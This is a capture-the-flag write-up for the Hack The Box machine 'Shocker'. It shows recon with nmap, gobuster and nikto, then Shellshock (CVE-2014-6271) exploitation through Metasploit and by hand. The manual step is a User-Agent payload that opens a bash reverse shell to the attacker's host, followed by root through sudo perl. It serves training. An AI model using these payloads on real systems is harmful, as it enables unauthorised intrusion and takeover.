Contents

🕵 HTB-Writeup : SHOCKER

Recon

nmap

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
nmap -sC -sV -Pn -p- -T5 10.10.10.56

21/tcp   filtered ftp
80/tcp   open     http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open     ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

gobuster

While scanning website, we discover an interesting /cgi-bin/ directory.

1
2
3
4
5
6
7
8
9
gobuster -u http://10.10.10.56 -w ~/CTF/TOOLS/wordlist/gobuster-wordlist.txt -t 10 -f

=====================================================
/.htaccess/ (Status: 403)
/cgi-bin/ (Status: 403)
/icons/ (Status: 403)
/.htpasswd/ (Status: 403)
/.htpasswds/ (Status: 403)
=====================================================

Vulnerabilities

Searching for vulnerabilities on the msfconsole or exploitdb using apache and cgi tags.

1
2
3
4
5
6
7
8
9
msf6 exploit(linux/ssh/quantum_vmpro_backdoor) > search apache cgi

Matching Modules
================

   #  Name                                             Disclosure Date  Rank       Check  Description
   -  ----                                             ---------------  ----       -----  -----------
   0  exploit/multi/http/apache_mod_cgi_bash_env_exec  2014-09-24       excellent  Yes    Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
   1  auxiliary/scanner/http/apache_mod_cgi_bash_env   2014-09-24       normal     Yes    Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner

We discover an exploit for CVE-2014-6271. The vulnerability exploit CGIs. CGI for Common Gateway Interface, it allows to communicate with the hosting server. Scripts can be set on this directory to do different actions. Let’s try to dirbust the cgi-bin folder!

I first try to run a nikto scan.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
nikto -h 10.10.10.56

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.56
+ Target Hostname:    10.10.10.56
+ Target Port:        80
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type.
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.46). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /, inode: 89, size: 559ccac257884, mtime: gzip
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST 
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8862 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time:           2022-07-28 21:42:46 (GMT0) (143 seconds)
---------------------------------------------------------------------------

The scan didn’t find anything interesting. Then, I run a classic gobuster and point on sh,pl,cgi,php extensions.

1
2
3
4
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.56/cgi-bin/ -x sh,cgi,pl 

===============================================================
/user.sh              (Status: 200)

I found a user.sh script. When trying to download it we see that it is a test script that was not deleted by admin.

1
2
3
Content-Type: text/plain
Just an uptime test script
 05:58:51 up 10:42,  0 users,  load average: 0.00, 0.00, 0.00

When searching on the metasploit console, I found the CVE-2014-6271 that is related to CGIs.

1
2
3
4
5
6
7
8
9
msf6 > search apache cgi

Matching Modules
================

   #  Name                                                 Disclosure Date  Rank       Check  Description
   -  ----                                                 ---------------  ----       -----  -----------
   3  exploit/multi/http/apache_mod_cgi_bash_env_exec      2014-09-24       excellent  Yes    Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
   4  auxiliary/scanner/http/apache_mod_cgi_bash_env       2014-09-24       normal     Yes    Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner

Let’s try to see if the host is vulnerable.

1
2
3
4
5
6
7
8
msf6 > use auxiliary/scanner/http/apache_mod_cgi_bash_env
msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > set rhosts 10.10.10.56
msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > set targeturi /cgi-bin/user.sh
msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > exploit

[+] uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The host is vulnerable to the Shellshock vulnerability! We found user shelly.

Exploit (Metasploit)

We then, get a shell from the Shellshock exploit module.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
msf6 > use exploit/multi/http/apache_mod_cgi_bash_env_exec
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > exploit

meterpreter > getuid
Server username: shelly

meterpreter > sysinfo
Computer     : 10.10.10.56
OS           : Ubuntu 16.04 (Linux 4.4.0-96-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux

We are drop on an Ubuntu server with the user shelly. We can get the user flag then, see which commands the user can invoke.

1
2
3
4
5
6
# get clean shell
python3 -c 'import pty; pty.spawn("/bin/bash")'

# get user flag
shelly@Shocker:/usr/lib/cgi-bin$ cat /home/shelly/user.txt 
*************************95b233

Exploit (w/o Metasploit)

As Metasploit will only be available once during the OSCP exam I try do the exploits whithout metasploit.

I found this OWASP presentation which explains how to manualy exploit the vulnerability and by checking how the nse shellshock script I knew I could use the user-agent header as input.

drawing

Command injection on the User-Agent header

I managed to run a command, now let’s get a reverse shell. I took my reverse shell from this payload all the things cheatsheet.

My machine:

1
2
3
4
5
6
7
$ nc -lvnp 8082
listening on [any] 8082 ...
connect to [10.10.16.5] from (UNKNOWN) [10.10.10.56] 55502
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$ id 
id
uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)

Request sent to the server:

1
2
3
4
GET /cgi-bin/user.sh HTTP/1.1
Host: 10.10.10.56
Upgrade-Insecure-Requests: 1
User-Agent: () { :;}; echo; /bin/bash -i >& /dev/tcp/10.10.16.5/8082 0>&1

And there is my reverse shell.

Privesc

1
2
3
shelly@Shocker:/usr/lib/cgi-bin$ sudo -l
User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl

shelly can invoke the /usr/bin/perl command in root without providing password.

We can just invoke a shell with the perl command with a sudo.

1
2
3
4
5
6
7
8

shelly@Shocker$ sudo perl -e 'exec "/bin/sh";'

# whoami
root

cat /root/root.txt
*************************c1ca467

We are now system owner !

Tags

Easy, External, Apache, Penetration Tester Level 1, Remote Code Execution, CVE-2014-6271, A06:2021-Vulnerable And Outdated Components, Enumeration, CGI, Sudo Exploitation, Web Site Structure Discovery, CVE Exploitation, Security Tools, Public Vulnerabilities